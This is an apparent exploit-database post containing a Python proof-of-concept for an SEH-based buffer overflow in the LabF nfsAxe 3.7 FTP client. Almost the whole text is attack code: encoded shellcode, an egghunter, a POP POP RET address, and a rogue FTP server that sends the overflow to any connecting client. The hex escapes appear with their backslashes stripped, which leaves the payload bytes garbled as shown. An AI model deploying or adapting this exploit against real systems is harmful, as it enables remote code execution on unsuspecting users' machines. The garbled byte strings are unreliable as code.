LabF nfsAxe FTP Client 3.7 Buffer Overflow
Posted on 17 May 2017
#!/usr/bin/python print "LabF nfsAxe 3.7 FTP Client Buffer Overflow (SEH)" print "Author: Tulpa / tulpa[at]tulpa-security[dot]com" #Author website: www.tulpa-security.com #Author twitter: @tulpa_security #Tested on Windows Vista x86 import socket import sys #badchars x00x10x0a buf = "" buf += "xbbx7exbcx7cx19xdaxc2xd9x74x24xf4x58x29" buf += "xc9xb1x59x83xe8xfcx31x58x0ex03x26xb2x9e" buf += "xecx3exf2x5ex0fxbex40x12x4bxbexa1xd5x95" buf += "xc7xc8x6fx9cx7exb7xddx8ex69x13x07xbfxae" buf += "x85x31xcax9dxfdxafxc8xe6x8fx7ex3fxf4xee" buf += "xa6xddx77xa2x8ex27xb9xcexcex9bx53x78x7c" buf += "xeex04xb5xb0x20xfexf5xf8x3cxffx5ex55xb4" buf += "x1axe9x08xc6x8exdaxebxa2xc5x1ax87x6bxd5" buf += "x97xe7x77x48x2cx5fx80x79x3fxedxc7x51x11" buf += "xbfx18x79x18xfcxbex92x0bx69x49x3ax2dx83" buf += "x23xc8x74xd0xc9xccx06x1fx37xb8xe2xb1x6b" buf += "xbfxdfxbex64xb3x20xc1x74x92xa9xc5xfaxc6" buf += "x41xf4xfdx60x17x1bx91x6dx43x8cx93x6cx6b" buf += "x4cx6bx3bx4bx1bxc4x94xdcxe4xbdx5dxb4x15" buf += "x14x7dxb3x29xa6x82x94xfaxa1x7ex1bx27x23" buf += "xf7xfdx4dx53x51x51x6dx06x45x02xc2x56x20" buf += "xb8xb3xfex99x3fx6exefx94x02xf7x8cx4axd6" buf += "x75xaexb6xe6x45xa5xa3x51xb5x91x42xb6xff" buf += "xa2x70x29x44xd5x3cx6dx79xa0xc0x49xc9x3b" buf += "x44xb6x85xb2xc8x92x45x48x74xffx75x06x24" buf += "xaex24xf7x85x01x8exa6x54x5dx65x49x07x5e" buf += "xd3x79x2ex41xb6x86xcfxb3xb8x2cx03xe3xb9" buf += "x9ax57xf4x13x0dx34x5fxcax1ax31x33xd6xbc" buf += "xcex89x2ax36x84x14x2bx49xcex9cx81x51x85" buf += "xf9x35x63x72x1ex07x2ax0fxd5xe3xadxe1x27" buf += "x0bx51xccx87x5fx92xcex7cxa7x22xc1x70xa6" buf += "x63x36x78x93x17xecx69x91x06x67xcbx7dxc8" buf += "x9cx8axf6xc6x29xd8x53xcbxacx35xe8xf7x25" buf += "xc8x07x1cx3bxfax17x6axd1xa3xc9x30x7ex9e" buf += "xfexca" egghunter = "x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74" egghunter += "xefxb8x77x30x30x74x8bxfaxafx75xeaxafx75xe7xffxe7" egg = "w00tw00t" nseh = "x90x90xEBx05" #JMP over SEH seh = "xF8x54x01x68" #POP POP RET 680154F8 in WCMDPA10.DLL buffer = "A" * 100 + egg + "x90" * 10 + buf + "D" * (9266-len(buf)) + nseh + seh + egghunter + "C" * 576 port = 21 try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(("0.0.0.0", port)) s.listen(5) print("[i] Evil FTP server started on port: "+str(port)+" ") except: print("[!] Failed to bind the server to port: "+str(port)+" ") while True: conn, addr = s.accept() conn.send('220 Welcome to your unfriendly FTP server ') print(conn.recv(1024)) conn.send("331 OK ") print(conn.recv(1024)) conn.send('230 OK ') print(conn.recv(1024)) conn.send('220 "'+buffer+'" is current directory ')
